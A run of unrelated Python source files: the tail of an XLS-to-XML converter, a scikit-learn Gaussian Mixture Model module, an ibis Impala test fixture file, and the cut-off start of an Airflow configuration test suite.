dict((i, "%s" % i) for i in range(cols[1]- cols[0])) else: # Use header row in the work sheet headers = {} # Lambda to decode XLS dates into an ISO datetime-string decode_date = lambda v: datetime.datetime(*xlrd.xldate_as_tuple(v, wb.datemode)) def decode(t, v): """ Helper method to decode the cell value by type @param t: the cell type @param v: the cell value @return: text representation of the cell value """ text = "" if v: if t is None: text = s3_unicode(v).strip() elif t == xlrd.XL_CELL_TEXT: text = v.strip() elif t == xlrd.XL_CELL_NUMBER: text = str(long(v)) if long(v) == v else str(v) elif t == xlrd.XL_CELL_DATE: text = encode_iso_datetime(decode_date(v)) elif t == xlrd.XL_CELL_BOOLEAN: text = str(value).lower() return text def add_col(row, name, t, v, hashtags=None): """ Helper method to add a column to an output row @param row: the output row (etree.Element) @param name: the column name @param t: the cell type @param v: the cell value """ col = SubElement(row, COL) col.set(FIELD, name) if hashtags: hashtag = hashtags.get(name) if hashtag and hashtag[1:]: col.set(HASHTAG, hashtag) col.text = decode(t, v) hashtags = dict(hashtags) if hashtags else {} # Process the rows record_idx = 0 extra_fields = set(extra_data) if extra_data else None check_headers = extra_fields is not None for ridx in range(*rows): # Read types and values types = s.row_types(ridx, *cols) values = s.row_values(ridx, *cols) # Skip empty rows if not any(v != "" for v in values): continue if header_row and record_idx == 0: # Read column headers if not fields: for cidx, value in enumerate(values): header = decode(types[cidx], value) headers[cidx] = header if check_headers: extra_fields.discard(header) check_headers = False else: if not fields and \ (header_row and record_idx == 1 or record_idx == 0): # Autodetect hashtags items = {} for cidx, name in headers.items(): try: t = types[cidx] v = values[cidx] except IndexError: continue if t not in (xlrd.XL_CELL_TEXT, xlrd.XL_CELL_EMPTY): items = None break elif v: items[name] = v if items and all(v[0] == '#' for v in items.values()): hashtags.update(items) continue # Add output row orow = SubElement(root, ROW) for cidx, name in headers.items(): if check_headers: extra_fields.discard(name) try: t = types[cidx] v = values[cidx] except IndexError: pass else: add_col(orow, name, t, v, hashtags=hashtags) check_headers = False # Add extra data if extra_fields: for key in extra_fields: add_col(orow, key, None, extra_data[key], hashtags=hashtags) record_idx += 1 return etree.ElementTree(root) # ----------------------------------------------------------------------------- def transform(tree, stylesheet_path, **args): if args: _args = [(k, "'%s'" % args[k]) for k in args] _args = dict(_args) else: _args = None stylesheet = etree.parse(stylesheet_path) ac = etree.XSLTAccessControl(read_file=True, read_network=True) transformer = etree.XSLT(stylesheet, access_control=ac) if _args: result = transformer(tree, **_args) else: result = transformer(tree) return result # ----------------------------------------------------------------------------- def main(argv): try: xlspath = argv[0] except: sys.stderr.write("Usage: python xls2xml.py <XLS File> [<XSLT Stylesheet>]\n") return try: xslpath = argv[1] except: xslpath = None xlsfile = open(xlspath) tree = xls2tree(xlsfile) if xslpath is not None: tree = transform(tree, xslpath) sys.stdout.write(etree.tostring(tree, pretty_print=True)) if __name__ == "__main__": sys.exit(main(sys.argv[1:])) # END =========================================================================
""" Gaussian Mixture Models. This implementation corresponds to frequentist (non-Bayesian) formulation of Gaussian Mixture Models. """ # Author: Ron Weiss <ronweiss@gmail.com> # Fabian Pedregosa <fabian.pedregosa@inria.fr> # Bertrand Thirion <bertrand.thirion@inria.fr> import numpy as np from scipy import linalg from ..base import BaseEstimator from ..utils import check_random_state from ..utils.extmath import logsumexp, pinvh from .. import cluster from sklearn.externals.six.moves import zip EPS = np.finfo(float).eps def log_multivariate_normal_density(X, means, covars, covariance_type='diag'): """Compute the log probability under a multivariate Gaussian distribution. Parameters ---------- X : array_like, shape (n_samples, n_features) List of n_features-dimensional data points. Each row corresponds to a single data point. means : array_like, shape (n_components, n_features) List of n_features-dimensional mean vectors for n_components Gaussians. Each row corresponds to a single mean vector. covars : array_like List of n_components covariance parameters for each Gaussian. The shape depends on `covariance_type`: (n_components, n_features) if 'spherical', (n_features, n_features) if 'tied', (n_components, n_features) if 'diag', (n_components, n_features, n_features) if 'full' covariance_type : string Type of the covariance parameters. Must be one of 'spherical', 'tied', 'diag', 'full'. Defaults to 'diag'. Returns ------- lpr : array_like, shape (n_samples, n_components) Array containing the log probabilities of each data point in X under each of the n_components multivariate Gaussian distributions. """ log_multivariate_normal_density_dict = { 'spherical': _log_multivariate_normal_density_spherical, 'tied': _log_multivariate_normal_density_tied, 'diag': _log_multivariate_normal_density_diag, 'full': _log_multivariate_normal_density_full} return log_multivariate_normal_density_dict[covariance_type]( X, means, covars) def sample_gaussian(mean, covar, covariance_type='diag', n_samples=1, random_state=None): """Generate random samples from a Gaussian distribution. Parameters ---------- mean : array_like, shape (n_features,) Mean of the distribution. covars : array_like, optional Covariance of the distribution. The shape depends on `covariance_type`: scalar if 'spherical', (n_features) if 'diag', (n_features, n_features) if 'tied', or 'full' covariance_type : string, optional Type of the covariance parameters. Must be one of 'spherical', 'tied', 'diag', 'full'. Defaults to 'diag'. n_samples : int, optional Number of samples to generate. Defaults to 1. Returns ------- X : array, shape (n_features, n_samples) Randomly generated sample """ rng = check_random_state(random_state) n_dim = len(mean) rand = rng.randn(n_dim, n_samples) if n_samples == 1: rand.shape = (n_dim,) if covariance_type == 'spherical': rand *= np.sqrt(covar) elif covariance_type == 'diag': rand = np.dot(np.diag(np.sqrt(covar)), rand) else: s, U = linalg.eigh(covar) s.clip(0, out=s) # get rid of tiny negatives np.sqrt(s, out=s) U *= s rand = np.dot(U, rand) return (rand.T + mean).T class GMM(BaseEstimator): """Gaussian Mixture Model Representation of a Gaussian mixture model probability distribution. This class allows for easy evaluation of, sampling from, and maximum-likelihood estimation of the parameters of a GMM distribution. Initializes parameters such that every mixture component has zero mean and identity covariance. Parameters ---------- n_components : int, optional Number of mixture components. Defaults to 1. covariance_type : string, optional String describing the type of covariance parameters to use. Must be one of 'spherical', 'tied', 'diag', 'full'. Defaults to 'diag'. random_state: RandomState or an int seed (0 by default) A random number generator instance min_covar : float, optional Floor on the diagonal of the covariance matrix to prevent overfitting. Defaults to 1e-3. thresh : float, optional Convergence threshold. n_iter : int, optional Number of EM iterations to perform. n_init : int, optional Number of initializations to perform. the best results is kept params : string, optional Controls which parameters are updated in the training process. Can contain any combination of 'w' for weights, 'm' for means, and 'c' for covars. Defaults to 'wmc'. init_params : string, optional Controls which parameters are updated in the initialization process. Can contain any combination of 'w' for weights, 'm' for means, and 'c' for covars. Defaults to 'wmc'. Attributes ---------- weights_ : array, shape (`n_components`,) This attribute stores the mixing weights for each mixture component. means_ : array, shape (`n_components`, `n_features`) Mean parameters for each mixture component. covars_ : array Covariance parameters for each mixture component. The shape depends on `covariance_type`:: (n_components, n_features) if 'spherical', (n_features, n_features) if 'tied', (n_components, n_features) if 'diag', (n_components, n_features, n_features) if 'full' converged_ : bool True when convergence was reached in fit(), False otherwise. See Also -------- DPGMM : Infinite gaussian mixture model, using the dirichlet process, fit with a variational algorithm VBGMM : Finite gaussian mixture model fit with a variational algorithm, better for situations where there might be too little data to get a good estimate of the covariance matrix. Examples -------- >>> import numpy as np >>> from sklearn import mixture >>> np.random.seed(1) >>> g = mixture.GMM(n_components=2) >>> # Generate random observations with two modes centered on 0 >>> # and 10 to use for training. >>> obs = np.concatenate((np.random.randn(100, 1), ... 10 + np.random.randn(300, 1))) >>> g.fit(obs) # doctest: +NORMALIZE_WHITESPACE GMM(covariance_type='diag', init_params='wmc', min_covar=0.001, n_components=2, n_init=1, n_iter=100, params='wmc', random_state=None, thresh=0.01) >>> np.round(g.weights_, 2) array([ 0.75, 0.25]) >>> np.round(g.means_, 2) array([[ 10.05], [ 0.06]]) >>> np.round(g.covars_, 2) #doctest: +SKIP array([[[ 1.02]], [[ 0.96]]]) >>> g.predict([[0], [2], [9], [10]]) #doctest: +ELLIPSIS array([1, 1, 0, 0]...) >>> np.round(g.score([[0], [2], [9], [10]]), 2) array([-2.19, -4.58, -1.75, -1.21]) >>> # Refit the model on new data (initial parameters remain the >>> # same), this time with an even split between the two modes. >>> g.fit(20 * [[0]] + 20 * [[10]]) # doctest: +NORMALIZE_WHITESPACE GMM(covariance_type='diag', init_params='wmc', min_covar=0.001, n_components=2, n_init=1, n_iter=100, params='wmc', random_state=None, thresh=0.01) >>> np.round(g.weights_, 2) array([ 0.5, 0.5]) """ def __init__(self, n_components=1, covariance_type='diag', random_state=None, thresh=1e-2, min_covar=1e-3, n_iter=100, n_init=1, params='wmc', init_params='wmc'): self.n_components = n_components self.covariance_type = covariance_type self.thresh = thresh self.min_covar = min_covar self.random_state = random_state self.n_iter = n_iter self.n_init = n_init self.params = params self.init_params = init_params if not covariance_type in ['spherical', 'tied', 'diag', 'full']: raise ValueError('Invalid value for covariance_type: %s' % covariance_type) if n_init < 1: raise ValueError('GMM estimation requires at least one run') self.weights_ = np.ones(self.n_components) / self.n_components # flag to indicate exit status of fit() method: converged (True) or # n_iter reached (False) self.converged_ = False def _get_covars(self): """Covariance parameters for each mixture component. The shape depends on `cvtype`:: (`n_states`, 'n_features') if 'spherical', (`n_features`, `n_features`) if 'tied', (`n_states`, `n_features`) if 'diag', (`n_states`, `n_features`, `n_features`) if 'full' """ if self.covariance_type == 'full': return self.covars_ elif self.covariance_type == 'diag': return [np.diag(cov) for cov in self.covars_] elif self.covariance_type == 'tied': return [self.covars_] * self.n_components elif self.covariance_type == 'spherical': return [np.diag(cov) for cov in self.covars_] def _set_covars(self, covars): """Provide values for covariance""" covars = np.asarray(covars) _validate_covars(covars, self.covariance_type, self.n_components) self.covars_ = covars def score_samples(self, X): """Return the per-sample likelihood of the data under the model. Compute the log probability of X under the model and return the posterior distribution (responsibilities) of each mixture component for each element of X. Parameters ---------- X: array_like, shape (n_samples, n_features) List of n_features-dimensional data points. Each row corresponds to a single data point. Returns ------- logprob : array_like, shape (n_samples,) Log probabilities of each data point in X. responsibilities : array_like, shape (n_samples, n_components) Posterior probabilities of each mixture component for each observation """ X = np.asarray(X) if X.ndim == 1: X = X[:, np.newaxis] if X.size == 0: return np.array([]), np.empty((0, self.n_components)) if X.shape[1] != self.means_.shape[1]: raise ValueError('The shape of X is not compatible with self') lpr = (log_multivariate_normal_density(X, self.means_, self.covars_, self.covariance_type) + np.log(self.weights_)) logprob = logsumexp(lpr, axis=1) responsibilities = np.exp(lpr - logprob[:, np.newaxis]) return logprob, responsibilities def score(self, X): """Compute the log probability under the model. Parameters ---------- X : array_like, shape (n_samples, n_features) List of n_features-dimensional data points. Each row corresponds to a single data point. Returns ------- logprob : array_like, shape (n_samples,) Log probabilities of each data point in X """ logprob, _ = self.score_samples(X) return logprob def predict(self, X): """Predict label for data. Parameters ---------- X : array-like, shape = [n_samples, n_features] Returns ------- C : array, shape = (n_samples,) """ logprob, responsibilities = self.score_samples(X) return responsibilities.argmax(axis=1) def predict_proba(self, X): """Predict posterior probability of data under each Gaussian in the model. Parameters ---------- X : array-like, shape = [n_samples, n_features] Returns ------- responsibilities : array-like, shape = (n_samples, n_components) Returns the probability of the sample for each Gaussian (state) in the model. """ logprob, responsibilities = self.score_samples(X) return responsibilities def sample(self, n_samples=1, random_state=None): """Generate random samples from the model. Parameters ---------- n_samples : int, optional Number of samples to generate. Defaults to 1. Returns ------- X : array_like, shape (n_samples, n_features) List of samples """ if random_state is None: random_state = self.random_state random_state = check_random_state(random_state) weight_cdf = np.cumsum(self.weights_) X = np.empty((n_samples, self.means_.shape[1])) rand = random_state.rand(n_samples) # decide which component to use for each sample comps = weight_cdf.searchsorted(rand) # for each component, generate all needed samples for comp in range(self.n_components): # occurrences of current component in X comp_in_X = (comp == comps) # number of those occurrences num_comp_in_X = comp_in_X.sum() if num_comp_in_X > 0: if self.covariance_type == 'tied': cv = self.covars_ elif self.covariance_type == 'spherical': cv = self.covars_[comp][0] else: cv = self.covars_[comp] X[comp_in_X] = sample_gaussian( self.means_[comp], cv, self.covariance_type, num_comp_in_X, random_state=random_state).T return X def fit(self, X): """Estimate model parameters with the expectation-maximization algorithm. A initialization step is performed before entering the em algorithm. If you want to avoid this step, set the keyword argument init_params to the empty string '' when creating the GMM object. Likewise, if you would like just to do an initialization, set n_iter=0. Parameters ---------- X : array_like, shape (n, n_features) List of n_features-dimensional data points. Each row corresponds to a single data point. """ ## initialization step X = np.asarray(X, dtype=np.float) if X.ndim == 1: X = X[:, np.newaxis] if X.shape[0] < self.n_components: raise ValueError( 'GMM estimation with %s components, but got only %s samples' % (self.n_components, X.shape[0])) max_log_prob = -np.infty for _ in range(self.n_init): if 'm' in self.init_params or not hasattr(self, 'means_'): self.means_ = cluster.KMeans( n_clusters=self.n_components, random_state=self.random_state).fit(X).cluster_centers_ if 'w' in self.init_params or not hasattr(self, 'weights_'): self.weights_ = np.tile(1.0 / self.n_components, self.n_components) if 'c' in self.init_params or not hasattr(self, 'covars_'): cv = np.cov(X.T) + self.min_covar * np.eye(X.shape[1]) if not cv.shape: cv.shape = (1, 1) self.covars_ = \ distribute_covar_matrix_to_match_covariance_type( cv, self.covariance_type, self.n_components) # EM algorithms log_likelihood = [] # reset self.converged_ to False self.converged_ = False for i in range(self.n_iter): # Expectation step curr_log_likelihood, responsibilities = self.score_samples(X) log_likelihood.append(curr_log_likelihood.sum()) # Check for convergence. if i > 0 and abs(log_likelihood[-1] - log_likelihood[-2]) < \ self.thresh: self.converged_ = True break # Maximization step self._do_mstep(X, responsibilities, self.params, self.min_covar) # if the results are better, keep it if self.n_iter: if log_likelihood[-1] > max_log_prob: max_log_prob = log_likelihood[-1] best_params = {'weights': self.weights_, 'means': self.means_, 'covars': self.covars_} # check the existence of an init param that was not subject to # likelihood computation issue. if np.isneginf(max_log_prob) and self.n_iter: raise RuntimeError( "EM algorithm was never able to compute a valid likelihood " + "given initial parameters. Try different init parameters " + "(or increasing n_init) or check for degenerate data.") # self.n_iter == 0 occurs when using GMM within HMM if self.n_iter: self.covars_ = best_params['covars'] self.means_ = best_params['means'] self.weights_ = best_params['weights'] return self def _do_mstep(self, X, responsibilities, params, min_covar=0): """ Perform the Mstep of the EM algorithm and return the class weihgts. """ weights = responsibilities.sum(axis=0) weighted_X_sum = np.dot(responsibilities.T, X) inverse_weights = 1.0 / (weights[:, np.newaxis] + 10 * EPS) if 'w' in params: self.weights_ = (weights / (weights.sum() + 10 * EPS) + EPS) if 'm' in params: self.means_ = weighted_X_sum * inverse_weights if 'c' in params: covar_mstep_func = _covar_mstep_funcs[self.covariance_type] self.covars_ = covar_mstep_func( self, X, responsibilities, weighted_X_sum, inverse_weights, min_covar) return weights def _n_parameters(self): """Return the number of free parameters in the model.""" ndim = self.means_.shape[1] if self.covariance_type == 'full': cov_params = self.n_components * ndim * (ndim + 1) / 2. elif self.covariance_type == 'diag': cov_params = self.n_components * ndim elif self.covariance_type == 'tied': cov_params = ndim * (ndim + 1) / 2. elif self.covariance_type == 'spherical': cov_params = self.n_components mean_params = ndim * self.n_components return int(cov_params + mean_params + self.n_components - 1) def bic(self, X): """Bayesian information criterion for the current model fit and the proposed data Parameters ---------- X : array of shape(n_samples, n_dimensions) Returns ------- bic: float (the lower the better) """ return (-2 * self.score(X).sum() + self._n_parameters() * np.log(X.shape[0])) def aic(self, X): """Akaike information criterion for the current model fit and the proposed data Parameters ---------- X : array of shape(n_samples, n_dimensions) Returns ------- aic: float (the lower the better) """ return - 2 * self.score(X).sum() + 2 * self._n_parameters() ######################################################################### ## some helper routines ######################################################################### def _log_multivariate_normal_density_diag(X, means, covars): """Compute Gaussian log-density at X for a diagonal model""" n_samples, n_dim = X.shape lpr = -0.5 * (n_dim * np.log(2 * np.pi) + np.sum(np.log(covars), 1) + np.sum((means ** 2) / covars, 1) - 2 * np.dot(X, (means / covars).T) + np.dot(X ** 2, (1.0 / covars).T)) return lpr def _log_multivariate_normal_density_spherical(X, means, covars): """Compute Gaussian log-density at X for a spherical model""" cv = covars.copy() if covars.ndim == 1: cv = cv[:, np.newaxis] if covars.shape[1] == 1: cv = np.tile(cv, (1, X.shape[-1])) return _log_multivariate_normal_density_diag(X, means, cv) def _log_multivariate_normal_density_tied(X, means, covars): """Compute Gaussian log-density at X for a tied model""" n_samples, n_dim = X.shape icv = pinvh(covars) lpr = -0.5 * (n_dim * np.log(2 * np.pi) + np.log(linalg.det(covars) + 0.1) + np.sum(X * np.dot(X, icv), 1)[:, np.newaxis] - 2 * np.dot(np.dot(X, icv), means.T) + np.sum(means * np.dot(means, icv), 1)) return lpr def _log_multivariate_normal_density_full(X, means, covars, min_covar=1.e-7): """Log probability for full covariance matrices. """ n_samples, n_dim = X.shape nmix = len(means) log_prob = np.empty((n_samples, nmix)) for c, (mu, cv) in enumerate(zip(means, covars)): try: cv_chol = linalg.cholesky(cv, lower=True) except linalg.LinAlgError: # The model is most probably stuck in a component with too # few observations, we need to reinitialize this components cv_chol = linalg.cholesky(cv + min_covar * np.eye(n_dim), lower=True) cv_log_det = 2 * np.sum(np.log(np.diagonal(cv_chol))) cv_sol = linalg.solve_triangular(cv_chol, (X - mu).T, lower=True).T log_prob[:, c] = - .5 * (np.sum(cv_sol ** 2, axis=1) + n_dim * np.log(2 * np.pi) + cv_log_det) return log_prob def _validate_covars(covars, covariance_type, n_components): """Do basic checks on matrix covariance sizes and values """ from scipy import linalg if covariance_type == 'spherical': if len(covars) != n_components: raise ValueError("'spherical' covars have length n_components") elif np.any(covars <= 0): raise ValueError("'spherical' covars must be non-negative") elif covariance_type == 'tied': if covars.shape[0] != covars.shape[1]: raise ValueError("'tied' covars must have shape (n_dim, n_dim)") elif (not np.allclose(covars, covars.T) or np.any(linalg.eigvalsh(covars) <= 0)): raise ValueError("'tied' covars must be symmetric, " "positive-definite") elif covariance_type == 'diag': if len(covars.shape) != 2: raise ValueError("'diag' covars must have shape " "(n_components, n_dim)") elif np.any(covars <= 0): raise ValueError("'diag' covars must be non-negative") elif covariance_type == 'full': if len(covars.shape) != 3: raise ValueError("'full' covars must have shape " "(n_components, n_dim, n_dim)") elif covars.shape[1] != covars.shape[2]: raise ValueError("'full' covars must have shape " "(n_components, n_dim, n_dim)") for n, cv in enumerate(covars): if (not np.allclose(cv, cv.T) or np.any(linalg.eigvalsh(cv) <= 0)): raise ValueError("component %d of 'full' covars must be " "symmetric, positive-definite" % n) else: raise ValueError("covariance_type must be one of " + "'spherical', 'tied', 'diag', 'full'") def distribute_covar_matrix_to_match_covariance_type( tied_cv, covariance_type, n_components): """Create all the covariance matrices from a given template """ if covariance_type == 'spherical': cv = np.tile(tied_cv.mean() * np.ones(tied_cv.shape[1]), (n_components, 1)) elif covariance_type == 'tied': cv = tied_cv elif covariance_type == 'diag': cv = np.tile(np.diag(tied_cv), (n_components, 1)) elif covariance_type == 'full': cv = np.tile(tied_cv, (n_components, 1, 1)) else: raise ValueError("covariance_type must be one of " + "'spherical', 'tied', 'diag', 'full'") return cv def _covar_mstep_diag(gmm, X, responsibilities, weighted_X_sum, norm, min_covar): """Performing the covariance M step for diagonal cases""" avg_X2 = np.dot(responsibilities.T, X * X) * norm avg_means2 = gmm.means_ ** 2 avg_X_means = gmm.means_ * weighted_X_sum * norm return avg_X2 - 2 * avg_X_means + avg_means2 + min_covar def _covar_mstep_spherical(*args): """Performing the covariance M step for spherical cases""" cv = _covar_mstep_diag(*args) return np.tile(cv.mean(axis=1)[:, np.newaxis], (1, cv.shape[1])) def _covar_mstep_full(gmm, X, responsibilities, weighted_X_sum, norm, min_covar): """Performing the covariance M step for full cases""" # Eq. 12 from K. Murphy, "Fitting a Conditional Linear Gaussian # Distribution" n_features = X.shape[1] cv = np.empty((gmm.n_components, n_features, n_features)) for c in range(gmm.n_components): post = responsibilities[:, c] # Underflow Errors in doing post * X.T are not important np.seterr(under='ignore') avg_cv = np.dot(post * X.T, X) / (post.sum() + 10 * EPS) mu = gmm.means_[c][np.newaxis] cv[c] = (avg_cv - np.dot(mu.T, mu) + min_covar * np.eye(n_features)) return cv def _covar_mstep_tied(gmm, X, responsibilities, weighted_X_sum, norm, min_covar): # Eq. 15 from K. Murphy, "Fitting a Conditional Linear Gaussian n_features = X.shape[1] avg_X2 = np.dot(X.T, X) avg_means2 = np.dot(gmm.means_.T, weighted_X_sum) return (avg_X2 - avg_means2 + min_covar * np.eye(n_features)) / X.shape[0] _covar_mstep_funcs = {'spherical': _covar_mstep_spherical, 'diag': _covar_mstep_diag, 'tied': _covar_mstep_tied, 'full': _covar_mstep_full, }
from __future__ import annotations import os from pathlib import Path import pytest import ibis import ibis.expr.types as ir import ibis.util as util from ibis import options from ibis.backends.impala.compiler import ImpalaCompiler, ImpalaExprTranslator from ibis.backends.tests.base import ( BackendTest, RoundAwayFromZero, UnorderedComparator, ) from ibis.tests.expr.mocks import MockBackend class TestConf(UnorderedComparator, BackendTest, RoundAwayFromZero): supports_arrays = True supports_arrays_outside_of_select = False check_dtype = False supports_divide_by_zero = True returned_timestamp_unit = 's' @staticmethod def connect(data_directory: Path): fsspec = pytest.importorskip("fsspec") env = IbisTestEnv() return ibis.impala.connect( host=env.impala_host, port=env.impala_port, auth_mechanism=env.auth_mechanism, hdfs_client=fsspec.filesystem( env.hdfs_protocol, host=env.nn_host, port=env.hdfs_port, user=env.hdfs_user, ), database=env.test_data_db, ) def _get_original_column_names(self, tablename: str) -> list[str]: import pyarrow.parquet as pq pq_file = pq.ParquetFile( self.data_directory / "parquet" / tablename / f"{tablename}.parquet" ) return pq_file.schema.names def _get_renamed_table(self, tablename: str) -> ir.TableExpr: t = self.connection.table(tablename) original_names = self._get_original_column_names(tablename) return t.relabel(dict(zip(t.columns, original_names))) @property def batting(self) -> ir.TableExpr: return self._get_renamed_table("batting") @property def awards_players(self) -> ir.TableExpr: return self._get_renamed_table("awards_players") class IbisTestEnv: def __init__(self): if options.impala is None: ibis.backends.impala.Backend.register_options() @property def impala_host(self): return os.environ.get('IBIS_TEST_IMPALA_HOST', 'localhost') @property def impala_port(self): return int(os.environ.get('IBIS_TEST_IMPALA_PORT', "21050")) @property def tmp_db(self): options.impala.temp_db = tmp_db = os.environ.get( 'IBIS_TEST_TMP_DB', 'ibis_testing_tmp_db' ) return tmp_db @property def tmp_dir(self): options.impala.temp_hdfs_path = tmp_dir = os.environ.get( 'IBIS_TEST_TMP_HDFS_DIR', f'/tmp/__ibis_test_{util.guid()}' ) return tmp_dir @property def test_data_db(self): return os.environ.get('IBIS_TEST_DATA_DB', 'ibis_testing') @property def test_data_dir(self): return os.environ.get( 'IBIS_TEST_DATA_HDFS_DIR', '/__ibis/ibis-testing-data' ) @property def nn_host(self): return os.environ.get('IBIS_TEST_NN_HOST', 'localhost') @property def hdfs_port(self): return int(os.environ.get('IBIS_TEST_HDFS_PORT', 50070)) @property def hdfs_superuser(self): return os.environ.get('IBIS_TEST_HDFS_SUPERUSER', 'hdfs') @property def use_codegen(self): return ( os.environ.get('IBIS_TEST_USE_CODEGEN', 'False').lower() == 'true' ) @property def auth_mechanism(self): return os.environ.get('IBIS_TEST_AUTH_MECH', 'NOSASL') @property def hdfs_user(self): return os.environ.get('IBIS_TEST_HDFS_USER', 'hdfs') @property def hdfs_protocol(self): return os.environ.get("IBIS_TEST_HDFS_PROTOCOL", "webhdfs") @pytest.fixture def env(): return IbisTestEnv() @pytest.fixture def tmp_dir(env): options.impala.temp_hdfs_path = tmp_dir = env.tmp_dir return tmp_dir @pytest.fixture def test_data_db(env): return env.test_data_db @pytest.fixture def test_data_dir(env): return env.test_data_dir @pytest.fixture def hdfs(env, tmp_dir): fsspec = pytest.importorskip("fsspec") client = fsspec.filesystem( env.hdfs_protocol, host=env.nn_host, port=env.hdfs_port, user=env.hdfs_user, ) if not client.exists(tmp_dir): client.mkdir(tmp_dir) return client @pytest.fixture def con_no_hdfs(env, test_data_db): con = ibis.impala.connect( host=env.impala_host, database=test_data_db, port=env.impala_port, auth_mechanism=env.auth_mechanism, ) if not env.use_codegen: con.disable_codegen() assert con.get_options()['DISABLE_CODEGEN'] == '1' try: yield con finally: con.set_database(test_data_db) @pytest.fixture def con(env, hdfs, test_data_db): con = ibis.impala.connect( host=env.impala_host, database=test_data_db, port=env.impala_port, auth_mechanism=env.auth_mechanism, hdfs_client=hdfs, ) if not env.use_codegen: con.disable_codegen() assert con.get_options()['DISABLE_CODEGEN'] == '1' try: yield con finally: con.set_database(test_data_db) @pytest.fixture def temp_char_table(con): statement = """\ CREATE TABLE IF NOT EXISTS {} ( `group1` varchar(10), `group2` char(10) )""" name = 'testing_varchar_support' sql = statement.format(name) con.con.execute(sql) try: yield con.table(name) finally: assert name in con.list_tables(), name con.drop_table(name) @pytest.fixture def tmp_db(env, con, test_data_db): impala = pytest.importorskip("impala") tmp_db = env.tmp_db if tmp_db not in con.list_databases(): con.create_database(tmp_db) try: yield tmp_db finally: con.set_database(test_data_db) try: con.drop_database(tmp_db, force=True) except impala.error.HiveServer2Error: # The database can be dropped by another process during tear down # in the middle of dropping this one if tests are running in # parallel. # # We only care that it gets dropped before all tests are finished # running. pass @pytest.fixture def con_no_db(env, hdfs): con = ibis.impala.connect( host=env.impala_host, database=None, port=env.impala_port, auth_mechanism=env.auth_mechanism, hdfs_client=hdfs, ) if not env.use_codegen: con.disable_codegen() assert con.get_options()['DISABLE_CODEGEN'] == '1' try: yield con finally: con.set_database(None) @pytest.fixture def alltypes(con, test_data_db): return con.table("functional_alltypes") @pytest.fixture def alltypes_df(alltypes): return alltypes.execute() def _random_identifier(suffix): return f'__ibis_test_{suffix}_{util.guid()}' @pytest.fixture def temp_database(con, test_data_db): name = _random_identifier('database') con.create_database(name) try: yield name finally: con.set_database(test_data_db) con.drop_database(name, force=True) @pytest.fixture def temp_table(con): name = _random_identifier('table') try: yield name finally: assert name in con.list_tables(), name con.drop_table(name) @pytest.fixture def temp_table_db(con, temp_database): name = _random_identifier('table') try: yield temp_database, name finally: assert name in con.list_tables(database=temp_database), name con.drop_table(name, database=temp_database) @pytest.fixture def temp_view(con): name = _random_identifier('view') try: yield name finally: assert name in con.list_tables(), name con.drop_view(name) @pytest.fixture def temp_parquet_table_schema(): return ibis.schema( [('id', 'int32'), ('name', 'string'), ('files', 'int32')] ) @pytest.fixture def temp_parquet_table(con, tmp_db, temp_parquet_table_schema): name = util.guid() db = con.database(tmp_db) db.create_table(name, schema=temp_parquet_table_schema, format='parquet') try: yield db[name] finally: db.client.drop_table(name, database=tmp_db) @pytest.fixture def temp_parquet_table2(con, tmp_db, temp_parquet_table_schema): name = util.guid() db = con.database(tmp_db) db.create_table(name, schema=temp_parquet_table_schema, format='parquet') try: yield db[name] finally: db.client.drop_table(name, database=tmp_db) @pytest.fixture(scope="session") def mockcon(): return MockBackend() @pytest.fixture def kudu_table(con, test_data_db): name = 'kudu_backed_table' con.raw_sql( f""" CREATE TABLE {test_data_db}.{name} ( a STRING, PRIMARY KEY(a) ) PARTITION BY HASH PARTITIONS 2 STORED AS KUDU TBLPROPERTIES ( 'kudu.master_addresses' = 'kudu', 'kudu.num_tablet_replicas' = '1' )""" ) drop_sql = f'DROP TABLE {test_data_db}.{name}' try: yield con.table(name) finally: con.raw_sql(drop_sql) def translate(expr, context=None, named=False): if context is None: context = ImpalaCompiler.make_context() translator = ImpalaExprTranslator(expr, context=context, named=named) return translator.get_result()
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import io import os import re import tempfile import unittest import warnings from collections import OrderedDict from unittest import mock from airflow import configuration from airflow.configuration import ( DEFAULT_CONFIG, AirflowConfigException, AirflowConfigParser, conf, expand_env_var, get_airflow_config, get_airflow_home, parameterized_config, run_command, ) from tests.test_utils.config import conf_vars from tests.test_utils.reset_warning_registry import reset_warning_registry @unittest.mock.patch.dict( 'os.environ', { 'AIRFLOW__TESTSECTION__TESTKEY': 'testvalue', 'AIRFLOW__TESTSECTION__TESTPERCENT': 'with%percent', 'AIRFLOW__TESTCMDENV__ITSACOMMAND_CMD': 'echo -n "OK"', 'AIRFLOW__TESTCMDENV__NOTACOMMAND_CMD': 'echo -n "NOT OK"', }, ) class TestConf(unittest.TestCase): def test_airflow_home_default(self): with unittest.mock.patch.dict('os.environ'): if 'AIRFLOW_HOME' in os.environ: del os.environ['AIRFLOW_HOME'] self.assertEqual(get_airflow_home(), expand_env_var('~/airflow')) def test_airflow_home_override(self): with unittest.mock.patch.dict('os.environ', AIRFLOW_HOME='/path/to/airflow'): self.assertEqual(get_airflow_home(), '/path/to/airflow') def test_airflow_config_default(self): with unittest.mock.patch.dict('os.environ'): if 'AIRFLOW_CONFIG' in os.environ: del os.environ['AIRFLOW_CONFIG'] self.assertEqual(get_airflow_config('/home/airflow'), expand_env_var('/home/airflow/airflow.cfg')) def test_airflow_config_override(self): with unittest.mock.patch.dict('os.environ', AIRFLOW_CONFIG='/path/to/airflow/airflow.cfg'): self.assertEqual(get_airflow_config('/home//airflow'), '/path/to/airflow/airflow.cfg') @conf_vars({("core", "percent"): "with%%inside"}) def test_case_sensitivity(self): # section and key are case insensitive for get method # note: this is not the case for as_dict method self.assertEqual(conf.get("core", "percent"), "with%inside") self.assertEqual(conf.get("core", "PERCENT"), "with%inside") self.assertEqual(conf.get("CORE", "PERCENT"), "with%inside") def test_env_var_config(self): opt = conf.get('testsection', 'testkey') self.assertEqual(opt, 'testvalue') opt = conf.get('testsection', 'testpercent') self.assertEqual(opt, 'with%percent') self.assertTrue(conf.has_option('testsection', 'testkey')) with unittest.mock.patch.dict( 'os.environ', 